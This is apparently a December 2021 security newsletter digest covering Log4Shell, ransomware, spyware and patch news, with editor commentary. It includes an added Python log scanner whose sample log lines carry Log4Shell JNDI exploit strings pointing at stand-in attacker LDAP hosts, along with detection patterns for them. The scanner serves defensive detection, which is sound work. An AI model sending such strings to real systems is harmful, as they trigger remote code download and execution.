Recently reported cyber incidents involving healthcare organizations include a telephone network and website outage at Capital Region Medical Center in Missouri; the theft of data belonging to more than 500,000 patients of Texas ENT Specialists; continuing operational disruptions at the Maryland Department of Health following a cyber incident; and a ransomware attack affecting the Coombe Women and Infants University Hospital in Dublin, Ireland.

Note

  • A nice roundup to remind people that those behind most cyberattacks are not the Hollywood depicted “computer nerd,” but in fact are cold hearted criminals who do not care what damage they cause or who they hurt in order to reach their goals. During a pandemic it is unthinkable and despicable for criminals to be targeting healthcare providers.
  • This is a good roundup of incidents and responses to learn from. Even if you’re not in healthcare, read to see where you may have similar gaps in your protections as well as better understand how the attacks are initiated and spread. Ask your team what would happen at your company and how they would handle it.
  • At a minimum, clinical applications should be isolated from vulnerable applications like e-mail and browsing.

Read more in

CISA Directs Federal Agencies to Mitigate Log4j Vulnerability by Next Friday

The US Cybersecurity and Infrastructure Security Agency (CISA) has directed federal agencies to mitigate the Log4j vulnerability (CVE-2021-44228) and three other security issues by December 24, 2021, in accordance with Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities.

Note

  • Tough tasks, but a directive like this may make more resources available to deal with this issue. Note that while there are literally millions of packets attempting simple “spray” attacks, which are usually not successful, the ones you are worried about are the attacks that are targeting specific software (vCenter comes to mind). The flood of broad scanning from everybody else may provide a smoke screen for the targeted attacks.
  • This is a multistep process and is worth consideration for anyone running Log4j. Start with the verification methods (scanner and lookup) to determine if your application is vulnerable. For those which are listed in either, see if there are vendor patches you need to apply which address the Log4j weakness. For home grown, or apps without patches, apply the workarounds from the Log4j security vulnerabilities page. Use caution just replacing the Log4j library without testing so as not to introduce instability.
  • It is interesting to watch how CISA is becoming more actively involved in and leading how the US government secures its environments and responds to incidents. In many ways, this is a good thing. We need a more centralized and coordinated effort as cyber threat actors, especially nation state actors, continue to up their game.
  • Ransomware groups are starting to leverage these and it will get worse through the holiday season. Your organization should have similar plans to avoid the impact that will inevitably come from exploitation of these vulnerabilities.

Read more in

Another Log4J Update

On Tuesday, December 14, Apache released Log4j 2.16.0 to address CVE-2021-45046, just days after releasing 2.15.0 to address the Log4Shell vulnerability. According to the CVE, “the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.”

Note

  • Whatever you do to find and update vulnerable systems, keep good notes. As we discussed in our livestream on Monday, vulnerabilities like this are often the prompt researchers need to look more closely at related flaws in this library (or other libraries that use similar features).
  • Yes, you worked your butt off deploying 2.15, and doggone it you have to replace it with 2.16. Note that 2.16 disables all JNDI support by default and removes message lookup handling entirely. These are really excellent steps. JNDI has been fraught with security issues; eliminating that for most of us will be transparent. The good news is you already know where you have Log4j which should simplify deployment and testing. Validate timing and concerns with your vendors to know what update/configuration options are supported.
  • With the heightened focus on log4j, we expect multiple vulnerabilities to be discovered in the next few months.

Read more in

CISA and White House Urge Vigilance for Critical Infrastructure

The US Cybersecurity and Infrastructure Security Agency (CISA) and the White House are urging critical infrastructure owners and operators to take steps to protect their networks from cyber threats. Both the CISA publication and the White House statement offer lists of suggested actions.

Note

  • While this may sound like a broken record, critical infrastructure remains a target. Regardless of your sector, try looking for your systems, networks, etc. in a tool like Shodan. Did you find port 3389? Images of system consoles? We know the drill: use secure access gateways/VPNs, review trust relationships, MFA all external access points, and segment OT/IoT, allowing only authorized systems and users to connect. If you need a hand or advice, reach out to your local CISA office; they have resources and references.

Read more in

White House Issues Cyber Incident Disclosure Rule

A memo from the US National Security Council requires critical cybersecurity agencies to assess cyber threats to determine if they could affect critical services, such as food or fuel. In some cases, the agencies will be required to report their initial assessments to the White House within 24 hours of learning of the incidents.

Note

  • The intent is to identify areas where more resources are needed to secure systems. Ultimately, some federal funding option may emerge. While resources are typically really thin, waiting for congressional funding is not a wise move in the current threat environment. Leverage resources from your local CISA, FBI, ISAC, and peers *now* to identify and/or mitigate risks. Some, like CISA, can help with an external assessment for little to no cost.

Read more in

December Patch Tuesday

Microsoft’s monthly security updates for December 2021 comprise fixes for more than 65 vulnerabilities, including one for a zero-day flaw in the AppX installer (CVE-2021-43890) that has been used to spread Emotet malware. The batch also addresses an issue that prevented Defender for Endpoint from launching on certain systems.

Note

  • Remember patch Tuesday or were you distracted by another security concern? So far, pushing this update has been smooth and the fix to Defender not launching will relieve some of the stress caused by that issue. Make sure your team is on this update as well as the Apple updates also released. Note that the zero-day (CVE-2021-43890) in the AppX installer is being actively exploited.
  • The actively exploited vulnerability is being used by multiple initial access groups and then sold via initial access brokers to other groups including ransomware. It is a busy month for patching but try to get these done before the holidays. Many organizations try to implement year-end freezes. These should not be in scope of that.

Read more in

Japanese Ministry Wants Social Media, Search Engines, to Disclose Physical Location of User Data

Japan’s Ministry of Internal Affairs and Communications plans to submit a revision to the Telecommunications Business Law that would require social media, search engine operators and large mobile phone companies to disclose where they physically store customer data. If passed, the amendment would require those companies to identify foreign subcontractors that have access to those data.

Note

  • It is important to know where *your* data is stored when using outsourced or cloud services. From my perspective, as a US government worker, export control, because of location or potential access is a key concern, followed by proximity/latency – availability. In this case, Japan is worried about citizens’ data being stored where it cannot be adequately protected to prevent a recurrence of the breach associated with the LINEpay app. If the final version of the legislation requires that data to be stored in Japan, it will be more expensive than defining allow and deny lists of allowed storage outside the country.

Read more in

PseudoManuscrypt Spyware

According to a report from Kaspersky, spyware called PseudoManuscrypt attempted to infect more than 35,000 machines in countries around the world. Kaspersky says the attacks targeted government networks and industrial control systems (ICS) between January and November 2021.

Note

  • While the attacks have been targeted to particular countries to date, don’t assume you’re safe. This one gets installed via pirated installers, so make sure that you are using genuine installers. Verify the source and signature – use your recorded trusted source from updates, not a reference from an email or text. Make sure that your VPN is not using reusable/replayable credentials. This malware records sounds from the microphone and captures screens, keystrokes, VPN credentials, and OS event log data.

Read more in

Egyptian Politician’s iPhone Infected with Two Types of Spyware

Researchers from the University of Toronto’s Citizen Lab found that the iPhones of two Egyptians – an exiled politician and a television news show host – were infected with spyware. Both iPhones were infected with Cytrox’s Predator spyware in June 2021; the politician’s phone was also infected with NSO Group’s Pegasus spyware. Meta is removing hundreds of Facebook and Instagram accounts linked to Cytrox.

Note

  • These devices were infected prior to the releases of iOS that closed the attack vector. The report from Citizen Lab gives insight into how the devices were infected, leveraging messaging with cultural biases and claims of a trusted source, much as we see with Business Email Compromise. Make sure your messaging security training includes SMS or other message platform, e.g., WhatsApp, not just email. Mitigate future compromise by keeping devices updated. Ask your MDM provider if it can detect these compromises. Then enable it along with reporting. Replacing compromised devices and carefully restoring data (if at all) is going to be easier than attempting to clean those which have been hacked.
  • If you have been following the Verizon Data Breach Incident Report (VZ DBIR) for several years, you will notice a repeated theme in their findings when it comes to mobile devices. It’s comparatively much harder to infect a mobile device than standard computers. In fact, there are two types of mobile devices that are most commonly infected: old outdated Android devices with dodgy mobile apps and highly-targeted individuals where threat actors are willing to pay hundreds of thousands of dollars to infect the device. This is a good example of the latter.
  • I highly recommend reading Google Project Zero’s blog post on Pegasus.
    googleprojectzero: A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

Read more in

Natural Gas Supplier Hit with Ransomware

Rochester, NY-based gas supplier Superior Plus has disclosed that its network was hit with a ransomware attack. The event began on December 12. Some of the company’s systems have been temporarily disabled.

Note

  • Threat actors are not unaware of the need for heating oil and gas during the winter; they are using every trick to ensure a payment is made. Beyond implementing security measures, make sure that your users are aware of the training you provided. Sometimes training and notification is provided ineffectively. Poll users to make sure the message is getting through. If it is not, modify the message and or delivery for success. Beware of stale security messages which will simply be ignored.

Read more in

CISA Adds Log4J to Catalog of Known Exploited Vulnerabilities

In a statement over the weekend, Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly said, “We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies — and signals to non-federal partners — to urgently patch or remediate this vulnerability.” A list maintained on GitHub includes hundreds of affected products and services with links to each vendor’s security advisory.

Note

  • CVE-2021-44228, or log4shell as the vulnerability has been named, has kept us all pretty busy this weekend. We have only seen the beginning of what will be a vast effort to protect from this vulnerability. Most attacks are currently attempting to very simply “spray” the exploit string into frequently logged fields. Over time, attackers will get better at targeting specific software packages. We have seen a bit of this with VMware vCenter. Affected security tools present a huge target attackers will not miss to exploit. Dealing with log4shell, make sure to preserve your notes. History has shown that once a high profile vulnerability like this is found, people will look for similar issues in other tools, and also take a deeper look at the affected library. JNDI is not unique to log4j and is a well-known issue. Another “lesson learned” of this still evolving incident: Secure configurations matter. The vulnerability may be mitigated by disabling the risky JNDI feature, and it looks like log4j will start shipping with it disabled by default. But for now: patch… patch… patch…
  • If you’re using Log4J 1.x, it is no longer supported, and you need to move to Log4j 2. Update to at least Log4J 2.16. Even so, you need to take actions to ensure you’re secure. Enumerate your externally facing devices with log4j installed, make sure your SOC is monitoring all the alerts from them and configure a WAF to reduce the attack surface and volume of alerts. If you have applications developed in Java and you have been contemplating migrating them to another technology you may want to execute that plan, particularly if you no longer have your Java expertise.
  • What makes this vulnerability so unique is just how ubiquitous it is (if your system, application or device is logging it could be vulnerable) but what is also unique is the attack surface. For this attack you are not remotely connecting to a specific port for a specific application, instead you are attacking any input that logs that input, such as connections to a web server, email filtering, etc. For an excellent overview of the attack and defenses, check out the webcast by SANS and instructors. www.youtube.com: What do you need to know about the log4j (Log4Shell) vulnerability?

Read more in

Log4Shell Exploit is Going to be Around for a Long Time

The US Cybersecurity and Infrastructure Security Agency (CISA) estimates that there are hundreds of millions of devices that are vulnerable to Log4Shell. Rob Joyce said that “The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.” Jake Williams said that “if you’re patching #log4j today on an Internet facing service, you need to be doing an incident response too. The reality is that someone else almost certainly beat you to it. Patching doesn’t remove the existing compromise.”

Note

  • When Log4j was introduced, it provided visibility and logging capabilities to our Java applications and services which we all leveraged and it is now included in many packages and distributions, meaning you’re going to have to work to make sure that it’s updated everywhere, particularly where embedded and you’re reliant on a third-party update. You need to take active steps to monitor and protect yourself, as well as verify you’re not already compromised. When you’re done updating, don’t turn off the monitoring.
  • It’s also important to note that if you scan for this vulnerability and discover your system is patched, make sure it was you who applied that patch. Criminals are known to patch systems they compromise to prevent others from doing the same.

Read more in

Mozilla Global Privacy Control Now Available to All Users

Mozilla has made Global Privacy Control (GPC) available to all users; the browser setting was rolled out on a limited basis earlier this fall. GPC tells websites not to share your personal data. The European Union’s General Data Protection Regulation (GDPR) requires GPC, but just two US states – Colorado and California – have laws that allow GPC enforcement.

Note

  • Consumer demand for increased privacy online is becoming more important to many businesses than regulatory pressure. Many software architects at consumer-facing software companies are seeing support for privacy as one of their high priority product requirements, not something security or legal teams are jamming in. As browser software vendors, Google and Mozilla are the initial touchpoint for those demands from consumers and they are both doing a good job of raising the bar on protecting users and their data.
  • This allows the browser to send a GPC opt-out signal to the far-end web site, but that web site has to have implemented code to respond to that signal, which is unlikely in areas where the legislation doesn’t apply. (E.g., not in California, Colorado, or the EU.) As this control expects the web server to have implemented controls, even when we see widespread adoption of response to GPC signals, it’s not clear this will truly be effective privacy control.

Read more in

Apple Releases Updates for Multiple OSes

Apple has released updates for multiple operating systems, including macOS, iOS, watchOS, iPadOS, and tvOS. The new iOS and iPadOS updates address 42 CVEs and add new features including Apple Music Voice Plan, “App Privacy Report” and new “communication safety” settings intended to notify parents when their children receive or send photos that contain nudity.

Note

  • The iOS, iPadOS, watchOS, tvOS and HomePod updates fix numerous RCE, Information Disclosure and Privilege Escalation flaws. You’ll want to push this out before the holidays. The new iOS App Privacy Report (in settings under Privacy) shows which apps are accessing which sensitive items like photos, contacts, and location as well as network activity. Use this to make sure that you don’t have unintended access and adjust permissions accordingly. The communication safety settings are under the Screen Time settings group and can be controlled via a separate passcode. Screen Time settings can also be shared across devices. The service is, by default, not enabled.
  • While well intentioned, the “communication safety” mechanism is likely to produce unintended consequences.

Read more in

Log4Shell Vulnerability is Being Actively Scanned for and Exploited

Attackers are scanning the Internet for vulnerable instances of Log4j. The vulnerability has been exploited to deploy ransomware and coin miners.

Note

  • I am always fascinated by what is done with an exploit. One hopes you’d detect the impact of a crypto miner immediately, but what about other anomalous behavior? Ask yourself if you have enough information about what normal is to detect changes. There are multiple lists of Log4Shell IOCs, there is a free one on GitHub you can leverage. github.com: Log4Shell-IOCs

Read more in

Ransomware Attack Hits Kronos

Kronos Private Cloud has been hit with a ransomware attack and has taken its private cloud services offline. The company is advising its customers to use “alternative business continuity protocols” until the issue is resolved. Kronos provides cloud-based solutions for workforce management and human resources.

Note

  • One of the services provided by Kronos is running payroll on behalf of their clients; this service has also been impacted. Have you considered in your BCP how your organization would manage its payroll in the event of those systems being disrupted? If not, now is the time to look into that.
  • Did you fully account for your HR or other workforce systems being offline for several weeks in your continuity of operations (COOP) plan? While the timing is never good to enact your continuity plan, the holidays this month and next provide options for time accounting which may make it easier to bridge that gap; you’re going to want to tabletop all workforce management actions to see what has to wait and what has a workaround.
  • While the vendor’s advice to “implement alternative business continuity protocols” may seem trite, business continuity planning is absolutely still a thing – even though we’ve pushed so much to SaaS/PaaS/etc. Thousands of healthcare, law enforcement, and retail organizations are whipping up Excel sheets this week to keep up operations. You always need a Plan B! Be sure to include any single point of failure in your tabletop exercises.

Read more in

Report: Irish Health Service Executive Ransomware Attack

According to a report from PWC, the ransomware attack that shut down the Irish Health Service Executive (HSE) last spring gained initial access through a phishing email. The Independent Post Incident Review says that HSE invoked its Critical Incident Process once it became aware of the situation.

Note

  • This report from PWC is an excellent read for anyone involved in cybersecurity with lessons and recommendations that many organizations should take on board. Huge kudos to the HSE for publishing this report even though they were not required to do so. Open and transparent sharing of post incident reports is a key tool in us all ensuring the security and safety of our systems and the Internet.
  • This report describes factors and warning signs that were missed. Look at these to see if you have missed anything. Is your endpoint-protection/anti-malware service in active blocking mode? Do you have any legacy operating systems? If so, how are you protecting them? Is your network protected from them? Are you only focused on user endpoints for security or are you including servers – particularly domain controllers? Specialized servers like these are good candidates for explicit allow and deny execution controls. How is your segmentation? Is it still intact, or has it been weakened by many exceptions? Be sure to look at resources in your sector ISAC, CISA, etc. which can provide assistance/expertise to help your budget and resources go further.

Read more in

Chrome Update Addresses Zero-Day

Google has pushed out an update for Chrome to fix a high-severity use-after-free vulnerability in the Chrome V8 JavaScript engine that is being actively exploited. In all, the newest version of Chrome comprises fixes for five security issues; four are high severity and one is deemed critical. Chrome 96.0.4664.110 for Windows, Mac, and Linux will roll out over the coming weeks.

Note

  • When the update is pushed Chrome has to be relaunched, monitor to make sure that happens within an acceptable window if you’re not stopping Chrome when deploying the update. While the update is scheduled to be released over a few weeks, double check to see if you can’t already download the updated version for your clients.

Read more in

CISA Warns of Flaw in Hillrom Cardio Products

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an ICS Medical Advisory regarding a vulnerability in Hillrom Welch Allyn Cardio products. The authentication bypass vulnerability affects multiple versions of several products when configured to use single sign-on.

Note

  • Until Hillrom updates are released and deployed, disable SSO on those products, ensure you’re isolating them from the business network and other systems, only allowing access by authorized systems and users, to include not exposing them directly to the Internet.

Read more in

Hellmann Working to Recover from Cyberattack

Hellmann Worldwide Logistics is recovering from a cyberattack. The company isolated its central data center after realizing its network was under attack. As of 4pm ET Monday afternoon, the company’s latest update says “[Our] business operations are largely running again and we are confident that we can eliminate remaining restrictions soon to be operating at full capacity again.”

Read more in

More Malicious NPM Packages

Malicious NPM libraries found in an open source repository appear to have been created to steal Discord access tokens and take control of infected systems. The libraries have been taken down.

Note

  • In the 2021 SANS New Threats and Attacks report, Ed Skoudis highlighted “dependency confusion” attacks as part of the overall software supply chain security issue. Like everything related to supply chain security, there are multiple areas that must be addressed – package manager configuration, software asset inventory, file integrity management, in addition to nascent efforts at having accurate and meaningful Software Bills of Material.
  • NPM is not the only repository being hit with malicious package versions; the PyPI (Python) and RubyGems (Ruby) repositories have also been hit. Make sure that your CI process includes only vetted versions of packages, then check to make sure none of your vetted versions are listed as compromised.

Read more in

US Expected to Introduce Malicious Cyber Tool Export Restriction Initiative

The Biden administration is expected to announce an initiative that will impose restrictions on the export of technology that could be used to conduct malicious cyber activity. The Export Control and Human Rights Initiative grew out of sanctions that have been imposed on NSO Group and other organizations that make technologies that are used to violate human rights.

Note

  • Current expectations are that this will be some sort of “non-binding code of conduct” so not yet worth a lot of angst about the unintended negative consequences of export controls on “dual use technologies” related to security. But (skewing old here) in 1995, the SATAN vulnerability scanning tool built by Dan Farmer and Wietse Venema was decried as being something bad guys would use to find vulnerabilities that would lead to them attacking good guys. Over time (along with other examples such as encryption and pen test tools) experience has shown that making it easier for better security tools to be in the hands of skilled defenders is more effective than making it harder for anyone (including bad guys) to obtain/use such tools.
  • Restricting the use of technology intended to violate human rights is a good thing. This initiative should align us with similar restrictions in the UK and elsewhere. Great caution must be exercised with restrictions on dual-use technology. Regulation can rapidly make cyber research as illegal as malicious exploitation.

Read more in

RCE Vulnerability in log4j Java Logging Package

A vulnerability in log4j could be exploited to allow remote code execution. Maintained by the Apache project, log4j is a popular library used to implement logging. The library supports many projects written in Java, including multiple cloud services and various open-source and commercial enterprise products. As an example, an attacker could include the exploit string as the user agent in an HTTP request. If the web application logs the user agent string using log4j, log4j can be tricked into connecting to the attacker’s server and downloading additional code that will be executed by the service. The vulnerability has been assigned CVE-2021-44228.
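As an added example for the detection side of the mechanism just described (not code from the page, from the Apache project, or from any vendor), the Python scanner below reads constructed web server access-log lines in the common "combined" format, undoes URL encoding, and flags log4j lookup strings in the request path, referer and user agent, separating the JNDI form from other lookups. The sample lines, field names and addresses are constructed (RFC 5737 documentation ranges).

```python
"""Scan Apache/Nginx "combined" access-log lines for Log4Shell (CVE-2021-44228)
lookup strings in attacker-controlled request fields.

Added example for this digest, not code from the page or the Apache project.
The lines in SAMPLE_LOG are constructed; addresses are RFC 5737 ranges.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# combined format: client ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Any log4j lookup "${...}" arriving in a request field is suspicious;
# "${jndi:" is the form the advisory describes as the exploit itself.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """Strip up to max_rounds of URL encoding so "%24%7B" matches like "${"."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def inspect_line(line: str) -> List[Dict[str, str]]:
    """Return one finding per request field that carries a lookup string."""
    fields = parse_combined(line)
    if fields is None:
        # Unparseable lines are checked whole rather than silently skipped.
        fields = {"client": "?", "raw": line}
    findings: List[Dict[str, str]] = []
    for name in ("request", "referer", "agent", "raw"):
        value = fields.get(name)
        if not value:
            continue
        text = decode_layers(value)
        if JNDI_RE.search(text):
            kind = "jndi-lookup"
        elif LOOKUP_RE.search(text):
            kind = "other-lookup"
        else:
            continue
        evidence = LOOKUP_RE.search(text) or JNDI_RE.search(text)
        findings.append({"client": fields["client"], "field": name,
                         "kind": kind, "evidence": evidence.group(0)})
    return findings


def scan_log(text: str) -> List[Dict[str, str]]:
    """Run inspect_line over every non-empty line, tagging findings with the line number."""
    findings: List[Dict[str, str]] = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        for finding in inspect_line(line):
            finding["line"] = str(number)
            findings.append(finding)
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings per kind, a quick triage view for the SOC."""
    counts: Dict[str, int] = {}
    for finding in findings:
        counts[finding["kind"]] = counts.get(finding["kind"], 0) + 1
    return counts


# Constructed sample: one benign request, a JNDI string in the user agent,
# a URL-encoded JNDI string in the path, and a non-JNDI lookup in a query.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:03:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2021:14:03:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
198.51.100.7 - - [10/Dec/2021:14:03:13 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"
192.0.2.9 - - [10/Dec/2021:14:03:14 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
    print(summarize(scan_log(SAMPLE_LOG)))
```

Run against real logs, treat the "jndi-lookup" hits as an incident trigger for the logging host (not just the web tier), since the string may have been forwarded and logged several hops downstream.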

Note

  • The importance of this vulnerability cannot be overstated. Past log4j vulnerabilities have been actively exploited for years, and vendors like Oracle continue to patch these past vulnerabilities in their products. Luckily there is a configuration workaround that you may consider to mitigate this vulnerability. Do so now as the exploit is trivial and has been made public.
  • This is a case for continuous in-house pentesting for organizations large enough to support it. Apache Log4j is one of those web application plumbing components that many companies won’t know they’re using – much like Apache Struts 2. In fact, if you’re running Struts 2, you’re likely running a vulnerable version of Log4j. Further, much like Struts vulnerabilities, it’s the kind of flaw that generally needs to be checked actively and won’t come up in typical vulnerability scans.

Read more in

Cyber Incident Reporting Requirements Removed from FY 2022 NDAA

The most recent version of the fiscal year 2022 US National Defense Authorization Act (NDAA) no longer includes language that would have imposed mandatory cyber incident reporting. Earlier versions of the NDAA included a provision that would have directed the Cybersecurity and Infrastructure Security Agency (CISA) to establish an incident reporting process for critical infrastructure operators.

Note

  • Beyond mandatory reporting, voluntary reporting is still an option and will help the CISA tune their response efforts. Regardless of reporting, working with the CISA and your sector ISAC will give you access to peers, best practices, assessments and incident response help and expertise.

Read more in

NIST to Solicit Input on Supply Chain Security Guidance

In early 2022, the US National Institute of Standards and Technology (NIST) will seek input to update its Cybersecurity Framework to include guidance for supply chain security issues. The request for information (RFI) will also likely seek ways to make the Cybersecurity Framework more consistent with other NIST cybersecurity guidance documents.

Note

  • NIST is expected to issue guidance on software security best practices in early February, 270 days after EO 14028 was issued; seize the opportunity to provide real-world input into this guidance. NIST will also be operating pilot programs, based on this guidance, which report out in May.
  • Three paragraphs in, this article has a line that starts with “While the agency has been studying the topic (for) years, …” and I stopped reading there.
  • The reports seem to suggest that NIST is focused on “advice to small business,” the segment least well equipped to do anything to address malicious code shipped to them by suppliers. We must hold suppliers accountable for malicious code that they ship.

Read more in

Eltima SDK Vulnerability Affects Cloud Services

Researchers from SentinelOne have detected a privilege elevation vulnerability in Eltima’s software development kit (SDK) for virtual networking. The library is used by multiple cloud services for USB over Ethernet capability. Vendors have made updates available.

Note

  • This vulnerability affects products like Amazon Workspaces that offer “Desktops in the Cloud.” To connect USB devices like cameras to these cloud systems, the Eltima SDK provides USB access over IP networks. The advisory lists some of the vulnerable products, but there are likely more.
  • Amazon released updates in July, while other cloud providers released updates in September and October. Make sure your cloud provider has implemented the updated USB over Ethernet drivers, if they are using Eltima’s packages. The update requires client and service changes, read your cloud service provider’s guidance. AWS AutoStop WorkSpaces with maintenance turned on, or AlwaysOn WorkSpaces with OS updates turned on will be updated, otherwise manual steps are needed. Scan to make sure the desktop clients are running the latest versions.

Read more in

SonicWall VPN Appliance Vulnerabilities

SonicWall is urging customers to patch SMA 100 series appliances to address at least eight security issues. Among the most serious vulnerabilities is an unauthenticated stack-based buffer overflow flaw that could be exploited to take control of vulnerable devices.

Note

  • There are no mitigations to this one, you need to update the firmware. Note this is the SMA 100 series – which includes the SMA 200, 201, 400, 410 and 500v appliances. As these appliances are providing firewall and remote access (boundary protection) services, prioritize updating them, particularly as remote access vulnerabilities have been a focus for threat actors.

Read more in

Cisco Warns of Apache HTTP Server Vulnerabilities That Affect Cisco Products

Cisco has updated a November 24 advisory about vulnerabilities in Apache HTTP Server to include additional information about products under investigation, vulnerable products, and products confirmed not vulnerable. The flaws were initially disclosed in September.

Note

  • Exploits include an unauthenticated remote attacker being able to leverage mod_proxy to forward requests to an arbitrary server. The Cisco advisory lists the vulnerable products, some of which do not yet have fixes. Read the product specific bug advisory for mitigations or workarounds.

Read more in

MikroTik Routers Vulnerable to Attacks

According to researchers from Eclypsium, up to 300,000 MikroTik routers are vulnerable to exploits that could harness their resources to be used in a botnet. The flaws have been known for more than a year.

Note

  • MikroTik routers are very capable and powerful devices, but they lack the management features enterprise equipment has, which makes it difficult to maintain them. Targeting more “Prosumers” and “Enthusiasts”, these devices are more capable than the average home/SMB router, but they do show the same weaknesses as the smaller devices. This makes them an interesting target for attackers looking for platforms to build botnets or mine cryptocoins.
  • Make sure that you’re changing default credentials, enabling auto-update of firmware, and disabling remote access to the management interface. Also make sure that you’re checking them for vulnerabilities or threats. The Eclypsium report includes links for a free tool which can check this for you.

Read more in

“Prolific” Canadian Cybercriminal Charged

Canadian and US officials have jointly charged Matthew Philbert with fraud and conspiracy in connection with multiple ransomware attacks. Philbert has been described as “the most prolific cybercriminal … identified in Canada.” The attacks targeted individuals, private companies, and government organizations in the US and Canada.

Note

  • Many of these attacks were targeted at small businesses less likely to have a robust security program and leveraged email with malicious attachments. “Use caution with attachments, particularly from unknown sources” has to be more than a slogan on a sign or implemented in training; make sure your users internalize it. Most cloud based email services offer security services to screen and/or block malicious attachments and senders; make sure that you’re enabling these services to help reduce the likelihood of a user choosing badly. The cost difference of these services, if any, is far less than recovery from ransomware or other incident.

Read more in

5 Things You Must Know About Log4Shell

This is the largest vulnerability we have seen in years. Here are 5 key things to note about this vulnerability:

  1. You may still be vulnerable even if your project is not based on Java. Many tech stacks are vulnerable because so many tools use Log4j, including infrastructure, dev-tools, and CI/CD products.
  2. Log4Shell will be here for a while. Log4j is a basic core component that is already in use in many products, including network devices, management consoles, and enterprise software and hardware. They just cannot be upgraded in a few days.
  3. Companies may still be vulnerable even if the vulnerable host is deep inside its network perimeter. The root cause of this issue is a simple string that could be logged by a vulnerable server through many hops — and trigger the remote code execution.
  4. There will be breaches. So, yes, your personal private data is at risk as well. On GitHub, someone has already posted screenshots of successful exploitation of resources belonging to large enterprises including Apple, Tesla, and Microsoft services.
  5. WAFs can’t protect in full. The exploit can come through any protocol, including APIs like gRPC and GraphQL, or for example DNS or UDP. WAFs are not really helpful here.

NSO’s Pegasus Spyware Found on iPhones of US State Department Employees

According to a report from Reuters, phones belonging to at least nine US State Department employees were infected with Pegasus spyware. The malware is made by NSO Group. The targeted employees were either based in Uganda or were working on Uganda-related issues. Pegasus capabilities include location tracking, microphone activation, and data theft. A State Department spokesperson declined to confirm the report.

Note

  • There are so many takeaways from this story. First, while NSO claims it will take legal action against those who misused its tools, their customers will likely have more success in claiming sovereign immunity than NSO itself. Second, it’s unfortunate that Apple doesn’t provide users with more information they can use to detect an attack themselves. Companies like NSO will continue to capitalize on this lack of transparency to victimize users. Finally, it’s hard to imagine these actions (and others like them) aren’t related to the sanctions placed on NSO.
  • The story of NSO should also be seen as a warning to other companies offering offensive tools commercially. Well-funded attackers often use the same tools red teams use legitimately in authorized penetration tests. So far, I don’t think anybody has found a way to effectively restrict how these tools are being used. NSO group stuck out for its unique abilities to attack mobile devices, and in some ways, its downfall was that the tool was “too good.”
  • Apple is taking the initiative to notify users who have devices infected with the NSO spyware. The vulnerability used to install their software was closed in the September release of iOS 14.8. Make sure that your devices are on current versions, particularly if deployed in foreign countries. Make sure that your mobile device management system can actively detect spyware installed on your devices rather than having a third party give you the bad news. Note that while NSO claims to only license their software to government agencies with strict terms including Israeli government granted export licenses, and use against USG employees is strictly prohibited, that is an administrative rather than a technical control; you need to implement the technical controls to ensure the attack vectors remain closed.
  • The US federal government has long neglected an opportunity to use its buying power to drive Google and Apple to support a trusted “Government App Store” as part of all federal wireless contracts. Google and Amazon provided federal cloud capabilities because the federal government did use their buying power as FedRAMP and US government “Cloud-first” initiatives were backed with procurement requirements.
  • Working for a company that sells an adversary emulation platform, we have to maintain a balance between operational security and feature sets. Products that do not “call home” are welcomed by our customers but if the product lands in the wrong hands, we would have no visibility into its use. This is what has occurred with Pegasus and other products. Learning from these mistakes is costly but required.

Read more in

FBI Warning on Critical Infrastructure Ransomware Attacks

The FBI has released a TLP:White Flash warning that the Cuba ransomware has been used in attacks targeting entities in multiple critical infrastructure sectors, including financial, healthcare, and IT. The Flash lists technical details about Cuba ransomware, as well as indicators of compromise and recommended mitigations.

Note

  • While I will always applaud the release of IOCs to aid with detection, the way this report was released leaves a bit to be desired. Critical infrastructure consists of 16 different sectors covering broad swaths of industry, including information technology. In the future it would be ideal if the broad cover of “critical infrastructure” isn’t used without further clarification.
  • Add the IOCs from the Flash to your SIEM and keep an eye out for new ones; the FBI is asking for new discoveries to be shared with them. Make sure you’re segmenting critical systems, only allowing communication between trusted components. Use strong/unique passwords or better still, require MFA for any services which can interact with these systems, which themselves may not be able to support MFA. Actively monitor activity to detect anomalous behavior.
  • Does your organization have a process to consume this cyber threat intelligence and ensure the team can detect and respond to these adversary behaviors? If not, performing adversary emulations as purple team exercises is one of the most efficient methods to test, measure, and improve your people, process, and technology so these known attacks do not impact your organization.

Read more in

Microsoft Dismantles APT Group’s Infrastructure

